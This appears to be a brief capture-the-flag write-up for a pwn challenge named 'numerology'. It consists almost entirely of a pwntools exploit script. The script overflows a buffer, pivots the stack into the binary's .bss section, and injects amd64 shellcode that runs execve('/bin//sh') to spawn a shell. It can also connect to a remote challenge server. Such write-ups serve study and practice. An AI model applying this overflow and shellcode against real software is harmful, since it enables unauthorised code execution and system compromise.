Tags: pwn
Rating: 2.0
Looks like an unexpected solution...
```python
# -*- coding: UTF-8 -*-
from pwn import *
import sys
import time
context.arch = 'amd64'
context.terminal = ['tmux','splitw','-h']
exec_file = './numerology'
if len(sys.argv) == 2:
if sys.argv[1] == 'debug':
gdb_debug = True
p = gdb.debug(exec_file,'b *0x401479\nc\n')
elif sys.argv[1] == 'remote':
p = remote('143.255.251.233','13373')
else:
p = process(exec_file)
def debug():
if gdb_debug:
gdb.attach(p,"b main\nc\n")
pause()
elf = ELF('./numerology')
new_stack = elf.bss() + 0x300
p.sendline('A' * 28 + p64(new_stack) + p64(0x4013BA))
shellcode = asm('''
xor rsi, rsi
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')
p.sendline(shellcode.ljust(36,'\x00') + p64(0x404310))
p.interactive()
```
